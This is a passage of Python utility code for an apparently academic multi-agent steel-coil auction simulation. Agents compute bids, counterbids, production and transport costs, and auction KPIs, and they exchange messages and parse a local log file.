'coil_auction_winner', 'coil_length', 'coil_width', 'coil_thickness', 'coil_weight',\n 'int_fab', 'bid', 'budget', 'ship_date', 'ship_date_rating',\n 'setup_speed',\n 'bid_rating', 'int_fab_priority', 'int_fab_rating', 'rating', 'rating_dif',\n 'negotiation',\n 'pre_auction_start', 'auction_start', 'auction_finish',\n 'active_tr_slot_1', 'active_tr_slot_2', 'tr_booking_confirmation_at', 'active_wh',\n 'wh_booking_confirmation_at', 'wh_location', 'active_coils', 'auction_coils',\n 'brAVG(tr_op_time)', 'brAVG(va_op_time)', 'AVG(tr_op_time)', 'AVG(va_op_time)',\n 'fab_start'\n 'slot_1_start', 'slot_1_end', 'slot_2_start', 'slot_2_end', 'delivered_to_wh',\n 'handling_cost_slot_1', 'handling_cost_slot_2',\n 'coil_ratings_1', 'coil_ratings_2',\n 'pre_auction_duration', 'auction_duration',\n 'gantt', 'location_diagram'\n ])'''\n return df\n\n\ndef browser_util(df):\n op_times_df = pd.DataFrame([], columns=['AVG(tr_op_time)', 'AVG(va_op_time)'])\n op_times_df.at[0, 'AVG(tr_op_time)'] = 72\n op_times_df.at[0, 'AVG(va_op_time)'] = 89\n\n sorted_df = df.sort_values(by=['time'])\n sorted_df = sorted_df.loc[df['status'] == \"on\"] # Solo los que estén activos\n active_time = 70\n sorted_df = sorted_df.loc[sorted_df['time'] < active_time]\n sorted_df = sorted_df.loc[:, ['location', 'id', 'From', 'agents']]\n sorted_df = sorted_df.drop_duplicates(subset=['id'])\n sorted_df = sorted_df.rename(columns={'id': 'agent'})\n sorted_df = sorted_df.reset_index(drop=True)\n for i in range(len(sorted_df['agent'])):\n slice = sorted_df.loc[i, 'agent'][:-3]\n if slice == 'coil_':\n sorted_df.at[i, 'agent_type'] = sorted_df.loc[i, 'agent'][:-4] # Crea otra columna con agent type\n elif slice == 'brow':\n sorted_df.at[i, 'agent_type'] = sorted_df.loc[i, 'agent']\n else:\n sorted_df.at[i, 'agent_type'] = sorted_df.loc[i, 'agent'][:-3]\n sorted_df = sorted_df.join(op_times_df)\n return sorted_df\n\ndef br_jid(agent_directory):\n \"\"\"Returns str with browser jid\"\"\"\n agents_df = agents_data()\n agents_df = agents_df.loc[agents_df['Name'] == \"browser\"]\n jid = agents_df['User name'].iloc[-1]\n return jid\n\ndef msg_to_br(msg_body, agent_directory):\n \"\"\"Returns msg object to send to browser agent\"\"\"\n agents_df = agents_data()\n agents_df = agents_df.loc[agents_df['Name'] == \"browser\"]\n jid = agents_df['User name'].iloc[-1]\n msg_br = Message(to=jid)\n msg_br.body = msg_body\n msg_br.set_metadata(\"performative\", \"inform\")\n return msg_br\n\ndef get_coil_list(browser_df, list):\n browser_df = browser_df.reset_index(drop=True)\n coil_df_nww = pd.DataFrame()\n for i in list:\n row_df = browser_df.loc[browser_df['location'] == i]\n coil_df_nww = coil_df_nww.append(row_df)\n coil_df_nww = coil_df_nww.sort_index()\n coil_df_nww = coil_df_nww.reset_index(drop=True)\n return coil_df_nww\n\ndef va_to_coils_initial_df(agent_df, conf_va_df):\n \"\"\"Builds df to send to coils with auction information made by agent_df and last plc temperatures\"\"\"\n agent_df.at[0, 'ancho'] = conf_va_df.loc[0, 'ancho']\n agent_df.at[0, 'largo'] = conf_va_df.loc[0, 'largo']\n agent_df.at[0, 'espesor'] = conf_va_df.loc[0, 'espesor']\n return agent_df\n\ndef conf_medidas(agent_df, configuracion_med):\n agent_df.at[0, 'ancho'] = configuracion_med.loc[0, 'ancho']\n agent_df.at[0, 'largo'] = configuracion_med.loc[0, 'largo']\n agent_df.at[0, 'espesor'] = configuracion_med.loc[0, 'espesor']\n return agent_df\n\ndef production_cost(configuracion_df,coil_df, i):\n z = coil_df.loc[i,'ancho'] - configuracion_df.loc[0,'ancho']\n m = coil_df.loc[i,'largo'] - configuracion_df.loc[0,'largo']\n n = coil_df.loc[i,'espesor'] - configuracion_df.loc[0,'espesor']\n cost = float(z * 4 + m * 2.5 + n * 2)\n return cost\n\ndef transport_cost(to):\n costes_df = pd.DataFrame()\n costes_df['From'] = ['NWW1', 'NWW1', 'NWW1','NWW1','NWW1','NWW3','NWW3','NWW3','NWW3','NWW3','NWW4','NWW4','NWW4','NWW4','NWW4']\n costes_df['CrossTransport'] = [24.6, 24.6, 0, 0, 55.6, 74.8, 74.8, 50.2, 50.2, 32.3, 71.5, 71.5, 46.9,46.9, 0]\n costes_df['Supply'] = [24.6, 24.6, 21.1, 21.1, 5.7, 24.6, 24.6, 21.1, 21.1, 5.7, 24.6, 24.6, 21.1, 21.1, 5.7]\n costes_df['To'] = ['va_08', 'va_09', 'va_10','va_11','va_12','va_08','va_09','va_10','va_11','va_12','va_08','va_09','va_10','va_11','va_12']\n costes_df = costes_df.loc[costes_df['To'] == to]\n costes_df = costes_df.reset_index(drop=True)\n return costes_df\n\ndef bid_evaluation(coil_msgs_df, va_data_df):\n key = []\n transport_cost_df = transport_cost(va_data_df.loc[0,'id'])\n for i in range(transport_cost_df.shape[0]):\n m = transport_cost_df.loc[i, 'CrossTransport']\n n = transport_cost_df.loc[i, 'Supply']\n key.append(n+m)\n transport_cost_df['transport_cost'] = key\n transport_cost_df = transport_cost_df.loc[:, ['From', 'To', 'transport_cost']]\n for i in range(coil_msgs_df.shape[0]):\n coil_msgs_df.at[i, 'production_cost'] = production_cost(va_data_df, coil_msgs_df, i)\n coil_msgs_df = coil_msgs_df.loc[:, ['From', 'id', 'agent_type', 'coil_jid', 'location', 'bid', 'production_cost', 'ancho', 'largo', 'espesor', 'ship_date', 'budget_remaining']]\n coil_msgs_df = coil_msgs_df.reset_index(drop=True)\n coil_msgs_df = coil_msgs_df.merge(transport_cost_df, on='From', sort=False)\n for i in range(coil_msgs_df.shape[0]):\n m = coil_msgs_df.loc[i, 'production_cost']\n n = coil_msgs_df.loc[i, 'transport_cost']\n coil_msgs_df.loc[i, 'minimum_price'] = m + n\n for i in range(coil_msgs_df.shape[0]):\n m = coil_msgs_df.loc[i, 'minimum_price']\n n = coil_msgs_df.loc[i, 'bid']\n coil_msgs_df.loc[i, 'difference'] = m - n\n results = coil_msgs_df.loc[:,['agent_type', 'id', 'coil_jid', 'bid', 'minimum_price', 'difference', 'ancho', 'largo', 'espesor', 'ship_date', 'budget_remaining']]\n results = results.sort_values(by=['difference'])\n results = results.reset_index(drop=True)\n value = []\n for i in range(results.shape[0]):\n value.append(i+1)\n results.insert(loc=0, column='position', value=value)\n return results\n\ndef counterbid_evaluation(coil_msgs_df, va_data_df):\n key = []\n transport_cost_df = transport_cost(va_data_df.loc[0,'id'])\n for i in range(transport_cost_df.shape[0]):\n m = transport_cost_df.loc[i, 'CrossTransport']\n n = transport_cost_df.loc[i, 'Supply']\n key.append(n + m)\n transport_cost_df['transport_cost'] = key\n transport_cost_df = transport_cost_df.loc[:, ['From', 'To', 'transport_cost']]\n for i in range(coil_msgs_df.shape[0]):\n coil_msgs_df.at[i, 'production_cost'] = production_cost(va_data_df, coil_msgs_df, i)\n coil_msgs_df = coil_msgs_df.loc[:, ['From', 'id', 'agent_type', 'coil_jid', 'location', 'counterbid', 'bid', 'production_cost', 'User_name_va', 'ancho', 'largo', 'espesor', 'budget_remaining', 'ship_date']]\n coil_msgs_df = coil_msgs_df.reset_index(drop=True)\n coil_msgs_df = coil_msgs_df.merge(transport_cost_df, on='From', sort=False)\n for i in range(coil_msgs_df.shape[0]):\n m = coil_msgs_df.loc[i, 'production_cost']\n n = coil_msgs_df.loc[i, 'transport_cost']\n coil_msgs_df.loc[i, 'minimum_price'] = m + n\n for i in range(coil_msgs_df.shape[0]):\n m = coil_msgs_df.loc[i, 'minimum_price']\n n = coil_msgs_df.loc[i, 'counterbid']\n coil_msgs_df.loc[i, 'profit'] = n - m\n results = coil_msgs_df.loc[:, ['agent_type', 'location', 'id', 'coil_jid', 'bid', 'counterbid', 'minimum_price', 'profit', 'User_name_va', 'ancho', 'largo', 'espesor', 'budget_remaining', 'ship_date']]\n results = results.sort_values(by=['profit'], ascending = False)\n results = results.reset_index(drop=True)\n value = []\n for i in range(results.shape[0]):\n value.append(i + 1)\n results.insert(loc=0, column='position', value=value)\n return results\n\ndef auction_kpis(va_data_df, auction_df, process_df, winner_df):\n df = auction_blank_df()\n #va\n df.at[0, 'purpose'] = 'inform'\n df.at[0, 'id_va'] = va_data_df.loc[0, 'id']\n df.at[0, 'accumulated_profit_va'] = va_data_df.loc[0, 'accumulated_profit']\n #coil_winner\n df.at[0, 'profit_va_auction'] = winner_df.loc[0, 'profit']\n df.at[0, 'id_winner_coil'] = winner_df.loc[0, 'id']\n df.at[0, 'coil_location_winner'] = winner_df.loc[0, 'location']\n df.at[0, 'minimum_price'] = winner_df.loc[0, 'minimum_price']\n df.at[0, 'bid_winner_coil'] = winner_df.loc[0, 'bid']\n df.at[0, 'counterbid_winner_coil'] = winner_df.loc[0, 'counterbid']\n df.at[0, 'budget_remaining_winner'] = winner_df.loc[0, 'budget_remaining']\n df.at[0, 'ship_date_winner'] = winner_df.loc[0, 'ship_date']\n df.at[0, 'coil_ancho_winner'] = winner_df.loc[0, 'ancho']\n df.at[0, 'coil_largo_winner'] = winner_df.loc[0, 'largo']\n df.at[0, 'coil_espesor_winner'] = winner_df.loc[0, 'espesor']\n\n df.at[0, 'pre_auction_start'] = auction_df.loc[0, 'pre_auction_start']\n df.at[0, 'pre_auction_duration'] = auction_df.loc[0, 'auction_start'] - auction_df.loc[0, 'pre_auction_start']\n df.at[0, 'auction_start'] = auction_df.loc[0, 'auction_start']\n df.at[0, 'auction_finish'] = datetime.datetime.now()\n df.at[0, 'auction_duration'] = df.loc[0, 'auction_finish'] - auction_df.loc[0, 'auction_start']\n df.at[0, 'fab_start'] = process_df['fab_start'].iloc[-1]\n df.at[0, 'fab_end'] = process_df['fab_end'].iloc[-1]\n df.at[0, 'time_wh'] = df.loc[0, 'fab_end'] + datetime.timedelta(seconds=30)\n\n df.at[0, 'active_coils'] = auction_df.loc[0, 'active_coils']\n df.at[0, 'auction_coils'] = auction_df.loc[0, 'auction_coils']\n df.at[0, 'active_coils'] = auction_df.loc[0, 'active_coils']\n df.at[0, 'number_preauction'] = auction_df.at[0, 'number_preauction']\n df.at[0, 'number_auction'] = auction_df.loc[0, 'number_auction']\n df.at[0, 'number_auction_completed'] = auction_df.loc[0, 'number_auction_completed']\n\n #df.at[0, 'coil_ratings_1'] = auction_df.loc[0, 'coil_ratings_1']\n df.at[0, 'coil_ratings'] = auction_df.loc[0, 'coil_ratings']\n\n #gantt_df = gantt(df)\n #df.at[0, 'gantt'] = gantt_df.to_dict()\n '''location_diagram_df = location_diagram(df)\n df.at[0, 'location_diagram'] = location_diagram_df.to_dict()'''\n return df\n\ndef gantt(auction_kpis_df):\n df = pd.DataFrame([], columns=['number_auction', 'task_id', 'task_name', 'duration', 'start', 'resource'])\n number = [auction_kpis_df.loc[0, 'number_auction_completed'], auction_kpis_df.loc[0, 'number_auction_completed'], auction_kpis_df.loc[0, 'number_auction_completed']]\n task_id = [1, 2, 3]\n task_name = ['pre_auction', 'auction', 'processing']\n duration = [auction_kpis_df.loc[0, 'pre_auction_duration'], auction_kpis_df.loc[0, 'auction_duration'], auction_kpis_df.loc[0, 'fab_end']-auction_kpis_df.loc[0, 'fab_start']]\n start = [auction_kpis_df.loc[0, 'pre_auction_start'], auction_kpis_df.loc[0, 'auction_start'], auction_kpis_df.loc[0, 'fab_start']]\n finish = [auction_kpis_df.loc[0, 'auction_start'], auction_kpis_df.loc[0, 'auction_finish'], auction_kpis_df.loc[0, 'fab_end']]\n resource = [auction_kpis_df.loc[0, 'active_coils'], auction_kpis_df.loc[0, 'auction_coils'], auction_kpis_df.loc[0, 'id_va']]\n\n df['number_auction'] = number\n df['task_id'] = task_id\n df['task_name'] = task_name\n df['duration'] = duration\n df['start'] = start\n df['finish'] = finish\n df['resource'] = resource\n\n print(\"GANTT: \\n\", df)\n return df\n\ndef change_agent(my_full_name, my_dir):\n df = pd.read_csv('agents.csv', header=0, delimiter=\",\", engine='python')\n df.loc[df.Name == my_full_name, 'Code'] = ''\n df.to_csv(f'{my_dir}''/''agents.csv', index=False, header=True)\n\ndef auction_entry(va_data_df, coil_df,number):\n dif_ancho = coil_df.loc[0,'ancho'] - va_data_df.loc[0, 'ancho']\n dif_largo = coil_df.loc[0, 'largo'] - va_data_df.loc[0, 'largo']\n dif_espesor = coil_df.loc[0, 'espesor'] - va_data_df.loc[0, 'espesor']\n dif_total = float(dif_ancho + dif_largo + dif_espesor)\n if (dif_total <= 250) or (number >= 5):\n if (va_data_df.loc[0, 'id'] == 'va_08' or va_data_df.loc[0, 'id'] == 'va_09') and (\n coil_df.loc[0, 'location'] == 'K'):\n answer = 1\n elif (va_data_df.loc[0, 'id'] == 'va_10' or va_data_df.loc[0, 'id'] == 'va_11') and (coil_df.loc[0, 'location'] == 'L'):\n answer = 1\n elif (va_data_df.loc[0, 'id'] == 'va_12') and (\n coil_df.loc[0, 'location'] == 'M' or coil_df.loc[0, 'location'] == 'N'):\n answer = 1\n else:\n answer = 0\n else:\n answer = 0\n return answer\n\ndef create_bid(coil_df, bid_mean):\n\n if coil_df.loc[0, 'number_auction'] <= 3:\n valor_1 = 0.16 * coil_df.loc[0, 'budget']\n elif coil_df.loc[0, 'number_auction'] > 3 and coil_df.loc[0, 'number_auction'] <= 7:\n valor_1 = 0.23 * coil_df.loc[0, 'budget']\n else:\n valor_1 = 0.4 * coil_df.loc[0, 'budget']\n \n if coil_df.loc[0, 'ship_date'] <= 10:\n valor_2 = 0.23 * coil_df.loc[0, 'budget']\n elif coil_df.loc[0, 'ship_date'] <= 16:\n valor_2 = 0.21 * coil_df.loc[0, 'budget']\n elif coil_df.loc[0, 'ship_date'] <= 25:\n valor_2 = 0.18 * coil_df.loc[0, 'budget']\n else:\n valor_2 = 0.16 * coil_df.loc[0, 'budget']\n \n oferta = 0.5 * bid_mean + valor_1 + valor_2\n \n if oferta > coil_df.loc[0, 'budget']:\n oferta = coil_df.loc[0, 'budget']\n return oferta\n\ndef create_counterbid(msg_va, coil_df):\n\n if msg_va.loc[0,'position'] <= 3:\n valor_1 = 0.7 * coil_df.loc[0, 'budget_remaining']\n else:\n valor_1 = 0.8 * coil_df.loc[0, 'budget_remaining']\n contraoferta = valor_1 + coil_df.loc[0, 'bid']\n return contraoferta\n\ndef compare_va(va_coil_msg_df, bid_register_df):\n\n va_coil_msg_df['winning_auction'] = va_coil_msg_df['counterbid']\n results = pd.concat([bid_register_df, va_coil_msg_df])\n results = results.sort_values(by=['winning_auction'])\n results = results.reset_index(drop=True)\n coil_name_winner = results.loc[0, 'User_name_va']\n return coil_name_winner\n\ndef va_msg_to(msg_body):\n \"\"\"Returns msg object without destination\"\"\"\n msg_tr = Message()\n msg_tr.body = msg_body\n msg_tr.set_metadata(\"performative\", \"inform\")\n return msg_tr\n\ndef msg_to_sender(received_msg):\n \"\"\"Returns msg to send without msg.body\"\"\"\n msg_reply = Message()\n msg_reply.to = str(received_msg.sender)\n msg_reply.set_metadata(\"performative\", \"inform\")\n return msg_reply\n\ndef process_df(df, coil_winner_df):\n process_df = df\n if pd.isnull(process_df['fab_start'].iloc[-1]):\n new_line_df = pd.Series(\n [np.nan, np.nan, np.nan, np.nan, np.nan, np.nan, np.nan, np.nan, np.nan],\n index=['fab_start', 'processing_time', 'start_auction_before', 'start_next_auction_at', 'fab_end',\n 'setup_speed', 'ancho', 'largo', 'espesor'])\n process_df = process_df.append(new_line_df, ignore_index=True)\n process_df = process_df.reset_index(drop=True)\n processing_time = 30 #600\n process_df['start_auction_before'].iloc[-1] = 1.5 * 60\n start_auction_before = process_df['start_auction_before'].iloc[-1]\n process_df['processing_time'].iloc[-1] = processing_time\n process_df['fab_start'].iloc[-1] = (datetime.datetime.now() + datetime.timedelta(minutes=5) - datetime.timedelta(minutes=2.5))\n process_df['fab_end'].iloc[-1] = process_df['fab_start'].iloc[-1] + datetime.timedelta(seconds=processing_time)\n start_next_auction_at = process_df['fab_end'].iloc[-1] - datetime.timedelta(seconds=start_auction_before)\n process_df['start_next_auction_at'].iloc[-1] = start_next_auction_at\n a = process_df['fab_start'].iloc[-1]\n else:\n process_df.loc[process_df.index.max() + 1, 'start_auction_before'] = \"\"\n processing_time = 100\n process_df['processing_time'].iloc[-1] = processing_time\n process_df['fab_start'].iloc[-1] = process_df['fab_end'].iloc[-2] #Empieza la última, cuando acaba la penúltima\n process_df['fab_start'] = pd.to_datetime(process_df['fab_start'])\n process_df['fab_end'].iloc[-1] = process_df['fab_start'].iloc[-1] + datetime.timedelta(seconds=processing_time)\n process_df['start_auction_before'].iloc[-1] = process_df['start_auction_before'].iloc[-2]\n start_next_auction_at = process_df['fab_end'].iloc[-1] - datetime.timedelta(seconds=process_df['start_auction_before'].iloc[-1])\n process_df['start_next_auction_at'].iloc[-1] = start_next_auction_at\n a = process_df['fab_start'].iloc[-1]\n process_df['ancho'].iloc[-1] = coil_winner_df.loc[0, 'ancho']\n process_df['largo'].iloc[-1] = coil_winner_df.loc[0, 'largo']\n process_df['espesor'].iloc[-1] = coil_winner_df.loc[0, 'espesor']\n return process_df\n\ndef my_full_name(agent_name, agent_number):\n decimal = \"\"\n if agent_name == \"coil\":\n if len(str(agent_number)) == 1:\n decimal = str(\"00\")\n elif len(str(agent_number)) == 2:\n decimal = str(0)\n full_name = str(agent_name) + str(\"_\") + decimal + str(agent_number)\n elif agent_name == \"log\":\n full_name = agent_name\n elif agent_name == \"browser\":\n full_name = agent_name\n elif agent_name == \"launcher\":\n full_name = agent_name\n else:\n if len(str(agent_number)) == 1:\n decimal = str(0)\n elif len(str(agent_number)) == 2:\n decimal = \"\"\n full_name = str(agent_name) + str(\"_\") + decimal + str(agent_number)\n return full_name\n\ndef set_agent_parameters_coil(my_dir, agent_name, agent_full_name, location, code):\n agent_data = pd.DataFrame([], columns=['id', 'agent_type','location', 'purpose', 'request_type', 'time', 'activation_time', 'int_fab'])\n agent_data.at[0, 'id'] = agent_full_name\n agent_data.at[0, 'agent_type'] = agent_name\n agents_df = agents_data()\n agents_df.loc[agents_df.Name == agent_full_name, 'location'] = location\n agents_df.loc[agents_df.Name == agent_full_name, 'Code'] = code\n agents_df.to_csv(f'{my_dir}''/''agents.csv', index=False, header=True)\n agents_df = agents_df.loc[agents_df['Name'] == agent_full_name]\n agents_df = agents_df.reset_index(drop=True)\n if agent_name == 'va':\n agent_data = agent_data.reindex(columns=['id', 'agent_type', 'purpose', 'request_type', 'time', 'activation_time', 'setup_speed', 'ancho', 'largo', 'espesor']) #Los valores ya existentes, se mantienen\n agent_data = va_parameters(agent_data, agents_df, agent_name)\n elif agent_name == \"coil\":\n agent_data = agent_data.reindex(\n columns=['id', 'agent_type', 'location', 'From', 'Code', 'purpose', 'request_type', 'time', 'activation_time', 'to_do', 'plant', 'number_auction', 'int_fab', 'bid', 'bid_status', 'ancho', 'largo', 'espesor', 'budget'])\n agent_data = coil_parameters(agent_data, agents_df, agent_name)\n else: #log,browser..\n agents_df = agents_data()\n df = agents_df.loc[agents_df['Name'] == agent_name]\n df = df.reset_index(drop=True)\n #agent_data.at[0, 'location'] = df.loc[0, 'Location']\n return agent_data\n\ndef set_agent_parameters(my_dir, agent_name, agent_full_name):\n agent_data = pd.DataFrame([], columns=['id', 'agent_type','location', 'purpose', 'request_type', 'time', 'activation_time', 'int_fab'])\n agent_data.at[0, 'id'] = agent_full_name\n agent_data.at[0, 'agent_type'] = agent_name\n agents_df = agents_data()\n agents_df = agents_df.loc[agents_df['Name'] == agent_full_name]\n agents_df = agents_df.reset_index(drop=True)\n if agent_name == 'va':\n agent_data = agent_data.reindex(columns=['id', 'agent_type', 'purpose', 'request_type', 'time', 'activation_time', 'setup_speed', 'ancho', 'largo', 'espesor']) #Los valores ya existentes, se mantienen\n agent_data = va_parameters(agent_data, agents_df, agent_name)\n elif agent_name == \"coil\":\n agent_data = agent_data.reindex(\n columns=['id', 'agent_type', 'location', 'From', 'Code', 'purpose', 'request_type', 'time', 'activation_time', 'to_do', 'plant', 'number_auction', 'int_fab', 'bid', 'bid_status', 'ancho', 'largo', 'espesor', 'budget'])\n agent_data = coil_parameters(agent_data, agents_df, agent_name)\n else: #log,browser..\n agents_df = agents_data()\n df = agents_df.loc[agents_df['Name'] == agent_name]\n df = df.reset_index(drop=True)\n #agent_data.at[0, 'location'] = df.loc[0, 'Location']\n return agent_data\n\ndef agent_jid(agent_directory, agent_full_name):\n agents_df = agents_data()\n agents_df = agents_df.loc[agents_df['Name'] == agent_full_name]\n agents_df = agents_df.reset_index(drop=True)\n jid_direction = agents_df.loc[agents_df.Name == agent_full_name, 'User name']\n jid_direction = jid_direction.values\n jid_direction = jid_direction[0]\n return jid_direction\n\ndef agent_passwd(agent_directory, agent_full_name):\n agents_df = agents_data()\n agents_df = agents_df.loc[agents_df['Name'] == agent_full_name]\n password = agents_df['Password'].iloc[-1]\n return password\n\ndef coil_parameters(agent_data, agents_df, agent_name):\n \"\"\"Sets pseudo random parameters\"\"\"\n rn = random()\n agent_data.at[0, 'int_fab'] = 0\n agent_data.at[0, 'location'] = agents_df.loc[0, 'location']\n agent_data.loc[0, 'From'] = agents_df.loc[0, 'From']\n agent_data.loc[0, 'Code'] = agents_df.loc[0, 'Code']\n agent_data.loc[0, 'to_do'] = \"search_auction\"\n agent_data.loc[0, 'plant'] = \"VA\"\n agent_data.at[0, 'ancho'] = 12 + (rn * 10) # between 12-22\n agent_data.at[0, 'largo'] = 13 + (rn * 10) # between 13-16\n agent_data.at[0, 'espesor'] = 14 + (rn * 10) # between 14-17\n agent_data.at[0, 'ship_date'] = 1 + (rn * 40) # Planning: between now and 41\n agent_data.at[0, 'number_auction'] = 0 + (rn * 10) # 0 y 10\n if rn < 0.15:\n agent_data.at[0, 'budget'] = 200 + (20 * random())\n else:\n agent_data.at[0, 'budget'] = 200\n return agent_data\n\ndef random_date(start, end):\n \"\"\"\n This function will return a random datetime between two datetime\n objects.\n \"\"\"\n delta = end - start\n int_delta = (delta.days * 24 * 60 * 60) + delta.seconds\n random_second = randrange(int_delta)\n return start + timedelta(seconds=random_second)\n\ndef va_parameters(agent_data, agents_df, agent_name):\n \"\"\"Sets pseudo random parameters\"\"\"\n rn = random()\n agent_data.at[0, 'ancho'] = 5 + (rn * 10) # between 5-15\n agent_data.at[0, 'largo'] = 6 + (rn * 10) # between 6-16\n agent_data.at[0, 'espesor'] = 7 + (rn * 10) # between 7-17\n return agent_data\n\ndef bid_register(agent_name, agent_full_name):\n \"\"\"Creates bid register\"\"\"\n df = pd.DataFrame([], columns=['id', 'agent_type', 'auction_owner', 'initial_bid', 'second_bid', 'won_bid', 'accepted_bid'])\n #df.at[0, 'id'] = agent_full_name\n #df.at[0, 'agent_type'] = agent_name\n return df\n\ndef msg_to_log(msg_body, agent_directory):\n agents_df = agents_data()\n agents_df = agents_df.loc[agents_df['Name'] == \"log\"]\n log_jid = agents_df['User name'].iloc[-1]\n msg_log = Message(to=log_jid)\n msg_log.body = msg_body\n msg_log.set_metadata(\"performative\", \"inform\")\n return msg_log\n\ndef msg_to_log_2(msg_body, agent_directory):\n agents_df = agents_data()\n agents_df = agents_df.loc[agents_df['Name'] == \"log\"]\n log_jid = agents_df['User name'].iloc[-1]\n msg_log = Message(to=log_jid)\n print(f'msg_body:{msg_body}')\n msg_log.body = msg_body\n msg_log.set_metadata(\"performative\", \"inform\")\n return msg_log\n\ndef activation_df(agent_full_name, status_started_at, df, *args):\n act_df = df.loc[:, 'id':'activation_time']\n act_df = act_df.astype(str)\n act_df.at[0, 'purpose'] = \"inform\"\n act_df.at[0, 'request_type'] = \"\"\n act_df.at[0, 'time'] = datetime.datetime.now()\n act_df.at[0, 'status'] = \"on\"\n act_df.at[0, 'activation_time'] = status_started_at\n if act_df.at[0, 'id'] == 'browser':\n act_df.drop(['location'], axis=1)\n if args:\n df = args[0]\n act_df = act_df.join(df)\n act_json = act_df.to_json(orient=\"records\")\n return act_json\n\ndef inform_log_df(agent_full_name, status_started_at, status, df, *args, **kwargs):\n \"\"\"Inform of agent status\"\"\"\n inf_df = df.loc[:, 'id':'activation_time']\n inf_df = inf_df.astype(str)\n inf_df.at[0, 'id'] = inf_df.at[0, 'id']\n inf_df.at[0, 'agent_type'] = inf_df.at[0, 'agent_type']\n inf_df.at[0, 'purpose'] = \"inform\"\n inf_df.at[0, 'request_type'] = \"\"\n inf_df.at[0, 'time'] = datetime.datetime.now()\n inf_df.at[0, 'status'] = status\n inf_df.at[0, 'activation_time'] = status_started_at\n if inf_df.at[0, 'id'] == 'browser':\n inf_df.drop(['location'], axis=1)\n if args:\n inf_df.at[0, 'to_do'] = args[0]\n inf_df.loc[0, 'plant'] = \"VA\"\n if kwargs: # in case did not enter auction\n inf_df.at[0, 'entered_auction'] = kwargs[0] # \"No, temp difference out of limit\"\n return inf_df\n\ndef op_times(p_df, ca_data_df):\n df = ca_data_df\n df.at[0, 'AVG(ca_op_time)'] = p_df['processing_time'].iloc[-1]\n df.at[0, 'AVG(tr_op_time)'] = (3 + random()) * 60 # between 3 and 4\n return df\n\ndef result(coil_ofertas_df, jid_list):\n df = pd.DataFrame([], columns=['Coil', 'Minimum_price', 'Bid', 'Difference', 'Budget_remaining'])\n for i in range(len(jid_list)):\n df.at[i, 'Coil'] = coil_ofertas_df.loc[i, 'id']\n df.at[i, 'Minimum_price'] = coil_ofertas_df.loc[i, 'minimum_price']\n df.at[i, 'Bid'] = coil_ofertas_df.loc[i, 'bid']\n df.at[i, 'Difference'] = coil_ofertas_df.loc[i, 'difference']\n df.at[i, 'Budget_remaining'] = coil_ofertas_df.loc[i, 'budget_remaining']\n return df\n\ndef results_2 (coil_contraofertas_df, jid_list):\n df = pd.DataFrame([], columns=['Coil', 'Minimum_price', 'Counterbid', 'Profit'])\n for i in range(len(jid_list)):\n df.at[i, 'Coil'] = coil_contraofertas_df.loc[i, 'id']\n df.at[i, 'Minimum_price'] = coil_contraofertas_df.loc[i, 'minimum_price']\n df.at[i, 'Counterbid'] = coil_contraofertas_df.loc[i, 'counterbid']\n df.at[i, 'Profit'] = coil_contraofertas_df.loc[i, 'profit']\n return df\n\ndef check_active_users_loc_times(va_data_df, agent_name, *args):\n \"\"\"Returns a json with va averages operation time\"\"\"\n if args == \"coils\":\n df = br_get_requested_df(agent_name, args)\n else:\n df = br_get_requested_df(agent_name)\n # Calculate means\n df['time'] = pd.to_datetime(df['time'])\n '''df['AVG(ca_op_time)'] = pd.to_datetime(df['AVG(ca_op_time)'], unit='ms')\n va_avg = df['AVG(ca_op_time)'].mean() # avg(operation_time_ca)\n if pd.isnull(va_avg):\n va_avg = 9\n else:\n va_avg = va_avg - datetime.datetime(1970, 1, 1)\n va_avg = va_avg.total_seconds() / 60\n op_times_df = pd.DataFrame([], columns=['AVG(va_op_time)'])\n op_times_df.at[0, 'AVG(va_op_time)'] = va_avg'''\n # Check active users locations\n sorted_df = df.sort_values(by=['time'])\n sorted_df = sorted_df.loc[sorted_df['agent_type'] == \"coil\"]\n sorted_df = sorted_df.drop_duplicates(subset=['id'], keep=\"last\")\n sorted_df = sorted_df.loc[sorted_df['status'] == \"auction\"]\n active_time = datetime.datetime.now() - datetime.timedelta(seconds=300)\n sorted_df = sorted_df.loc[sorted_df['time'] < active_time]\n uniques = sorted_df['id']\n uniques = uniques.drop_duplicates()\n uniques = uniques.tolist()\n values = []\n keys = []\n for i in uniques:\n a = sorted_df.loc[sorted_df['id'] == i]\n last_id = a.loc[a.index[-1], 'id']\n last_location = a.loc[a.index[-1], 'location']\n keys.append(last_id)\n values.append(last_location)\n users_location = dict(zip(keys, values))\n users_location_df = pd.DataFrame([users_location])\n users_location_df = users_location_df.T\n indexes = users_location_df.index.values.tolist()\n users_location_df.insert(loc=0, column='agent', value=indexes)\n users_location_df = users_location_df.rename(columns={0: \"location\"})\n users_location_df = users_location_df.reset_index(drop=True)\n for i in range(len(users_location_df['agent'])):\n slice = users_location_df.loc[i, 'agent'][:-3]\n if slice == 'coil_':\n users_location_df.at[i, 'agent_type'] = users_location_df.loc[i, 'agent'][:-4]\n elif slice == 'brow':\n users_location_df.at[i, 'agent_type'] = users_location_df.loc[i, 'agent']\n else:\n users_location_df.at[i, 'agent_type'] = users_location_df.loc[i, 'agent'][:-3]\n # Joins information\n #users_location_df = users_location_df.join(op_times_df)\n #users_location_df = users_location_df.loc[users_location_df['agent_type'] == \"coil\"]\n users_location_df = users_location_df.reset_index(drop=True)\n coil_df = pd.DataFrame()\n z = va_data_df.loc[0, 'wh_available']\n for i in z:\n row_df = users_location_df.loc[users_location_df['location'] == i]\n coil_df = coil_df.append(row_df)\n coil_df = coil_df.sort_index()\n coil_df = coil_df.reset_index(drop=True)\n coil_df = get_coil_list(coil_df, va_data_df.loc[0, 'list_coils'])\n return coil_df\n\ndef br_get_requested_df(agent_name, *args):\n \"\"\"Returns a df in which calculations can be done\"\"\"\n df = pd.DataFrame()\n if args == \"coils\":\n search_str = '{\"id\":{\"0\":\"' + \"coil\" + '_' # tiene que encontrar todas las coil que quieran fabricarse y como mucho los últimos 1000 registros.\n else:\n search_str = \"activation_time\" # takes every record with this. Each agent is sending that info while alive communicating to log.\n l = []\n N = 1000\n with open(r\"log.log\") as f:\n for line in f.readlines()[-N:]: # from the last 1000 lines\n if search_str in line: # find search_str\n n = line.find(\"{\")\n a = line[n:]\n l.append(a)\n df_0 = pd.DataFrame(l, columns=['register'])\n for ind in df_0.index:\n if ind == 0:\n element = df_0.loc[ind, 'register']\n for x in range(len(element)):\n element = element.replace(\"]\", \"\")\n y = json.loads(element)\n df = pd.DataFrame(y, index=[0])\n else:\n element = df_0.loc[ind, 'register']\n for x in range(len(element)):\n 